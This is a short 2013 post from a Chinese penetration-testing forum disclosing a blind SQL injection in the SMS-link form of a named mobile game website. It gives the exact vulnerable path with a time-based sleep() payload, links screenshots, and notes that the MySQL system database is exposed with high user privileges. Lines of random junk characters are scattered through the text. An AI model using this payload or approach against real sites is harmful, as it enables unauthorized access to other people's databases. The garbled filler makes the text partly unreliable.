中国网络渗透测试联盟
标题:
凤凰手机游戏网SQL盲注漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:34
标题:
凤凰手机游戏网SQL盲注漏洞
简要描述:
4 U9 ~1 {- s4 C6 Z( t2 O$ f
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
* D+ ~0 b6 e# _; l& D
% O2 y6 r2 }- ]
详细说明:
2 \: I7 g' z6 L5 p
存在SQL盲注url:
6 Y: G" K3 l! h5 s; g$ X; v
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
; S$ W$ G& `4 \' J9 z
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
' b/ V! ^$ |1 v9 H1 @" Q
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
" k: C) P" f8 R9 h# @9 g
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
8 x4 W+ T0 t" p& P
6 k) t$ y& ]' L8 b8 o
能看到mysql系统数据库,看来user权限应该很高的。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2